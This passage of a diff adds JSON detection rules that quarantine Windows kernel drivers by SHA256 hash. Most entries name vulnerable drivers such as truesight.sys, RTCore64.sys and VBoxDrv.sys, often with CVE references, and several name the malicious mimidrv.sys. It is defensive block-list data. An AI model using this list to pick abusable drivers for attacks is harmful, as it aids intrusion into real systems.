+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500628Z",
+ "creation_date": "2026-03-23T11:45:31.500631Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500640Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77b849bca8645b152d5f432dfa504d3ea82f6512bdcdaa2db4db0ecbba55da85",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "837d341b-8f99-5ce8-b3fd-cafc1ac3cb24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622845Z",
+ "creation_date": "2026-03-23T11:45:29.622847Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622852Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a8492a553ee840235fd12fa47b6caf1e5a8c82c3f4b681921246d7f192ed9126",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8383dda2-a77c-51b0-9a4e-2cf40e70d555",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145695Z",
+ "creation_date": "2026-03-23T11:45:31.145697Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145702Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28eb2875b5190910d71d53955f348b9a2b2b713cea5d873b619fcdcad6c5b5d4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83969ff2-f4a7-5ae5-993b-99905f623882",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607434Z",
+ "creation_date": "2026-03-23T11:45:29.607436Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607442Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0466dac557ee161503f5dfbd3549f81ec760c3d6c7c4363a21a03e7a3f66aca8",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8398fe1b-53c4-5b3e-81cd-ce567fd37f28",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975786Z",
+ "creation_date": "2026-03-23T11:45:29.975788Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975794Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "98636f857235fb66122296db147cd29440de681a29bbd631fc94373da31f99fa",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83a108ea-13c6-58cd-a303-b27fbcaec527",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832747Z",
+ "creation_date": "2026-03-23T11:45:30.832749Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832754Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7862001824edd94941d6ee2be998c9debf2d50e06b93f0abe54241c6b4a1d51f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83b1e3c4-f372-5fdd-837c-1b6c7ca15ce2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978703Z",
+ "creation_date": "2026-03-23T11:45:29.978705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978710Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f596e64f4c5d7c37a00493728d8756b243cfdc11e3372d6d6dfeffc13c9ab960",
+ "comment": "Vulnerable Kernel Driver (aka PanIO.sys) [https://www.loldrivers.io/drivers/5f70bde4-9f81-44a8-9d3e-c6c7cf65bfae/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83b9ac6d-cf98-515e-82f2-7d421574deaf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150634Z",
+ "creation_date": "2026-03-23T11:45:31.150636Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150641Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f77034fb1a3d4a0d4cf23acf0753f0fb0349b82ec4be40290cb3f43e53352e2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83c4f723-f120-5000-b16c-77721fc6d51e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468746Z",
+ "creation_date": "2026-03-23T11:45:30.468749Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468757Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "002616bfe5bf3b13868d649d74ffe748317e3b0b33de8b9008683c906a0cae83",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83d6c271-341d-5da8-a775-7e5ab597d583",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470072Z",
+ "creation_date": "2026-03-23T11:45:30.470075Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ab6430b72807637cc173f174301d8411bc17ec2cb542e739d28f77eb9d47327",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83f25173-0739-51f5-8a45-47a36fdcec6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608120Z",
+ "creation_date": "2026-03-23T11:45:29.608122Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608128Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a9b51770ba69c73db8fc81d50017e7ccf59dd05d3024d4c9f8ce03076ca8a7b",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83f331b2-0899-5e23-a540-7e2d208bd1b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146746Z",
+ "creation_date": "2026-03-23T11:45:32.146748Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146753Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cba6ac0031f6ee2ea4bf8ffc7a1cffff7c4448431584f54b9a0fbec799e2466f",
+ "comment": "Vulnerable Kernel Driver (aka ACPIx86.sys) [https://www.loldrivers.io/drivers/fd6c52b1-aeaa-4d89-8051-91acc68c3270/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83fbe314-ca7a-5144-a437-b029442f0342",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830000Z",
+ "creation_date": "2026-03-23T11:45:30.830002Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f281d9a254dee1e0a809cb71fa9355aadfc73d4777831da676e1a0d5ce9d983c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83fe7233-0463-59c7-87a1-aadd5c7097f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822782Z",
+ "creation_date": "2026-03-23T11:45:30.822784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822789Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4f90ded38e11860497b9d0290bcf93a6bcb48e836b334010894a2de865b148c",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8402f38a-1832-5284-b84b-2a4efd94e8af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469233Z",
+ "creation_date": "2026-03-23T11:45:30.469237Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469246Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40c740c6820ddc8f01013e7354278166c090cfe5e4027be1b187cf8cbd8a6b3f",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "840383ca-477d-5119-952a-c07eba4022aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609997Z",
+ "creation_date": "2026-03-23T11:45:29.609999Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610004Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "00dfeab446afecac7b44b0b1680d5ca7d421eda243e16db8c08706bb593a8391",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84051940-b341-5d3d-b654-89f40954433c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818574Z",
+ "creation_date": "2026-03-23T11:45:31.818577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1ba36fd2f7ee03f735164bd08a6c98621e5f9a17b63cd1ad37cad050e2a4bf80",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84093ef4-c64c-57a0-9134-bbae6673e9ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815437Z",
+ "creation_date": "2026-03-23T11:45:31.815439Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815445Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa38a29b4dcda0a241b94c94e0b3ce9c06c344ffe59f718d4f30671a17d22123",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "840d31fa-24d9-5d52-ba97-29264b6b263d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984070Z",
+ "creation_date": "2026-03-23T11:45:29.984072Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984077Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca",
+ "comment": "Vulnerable Kernel Driver (aka VProEventMonitor.sys) [https://www.loldrivers.io/drivers/4db827b1-325b-444d-9f23-171285a4d12f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8411267b-dd5f-5a32-844d-15a4f8ec3a5c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495689Z",
+ "creation_date": "2026-03-23T11:45:31.495691Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495696Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2fec89ba7ffb18f394f1387413b7ae2165480821b565f0fdd9719c8a90c8e072",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84294827-86dd-5e91-8dcc-5191dd6e4a78",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497488Z",
+ "creation_date": "2026-03-23T11:45:31.497491Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497498Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c362c7738a6d9a3dd6329bce987ac36874574384b275c3fcf3e27cf65dfb65ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "843673fd-4586-5c5b-8bdf-9bc5117493f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809850Z",
+ "creation_date": "2026-03-23T11:45:31.809852Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809857Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "145cf879dd3dcf38b328d1a0b94ffee8534fa6f5d0c34264d59fed7154b5c1c4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8444fbf2-dc2a-5d36-81c3-d5f5778557f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
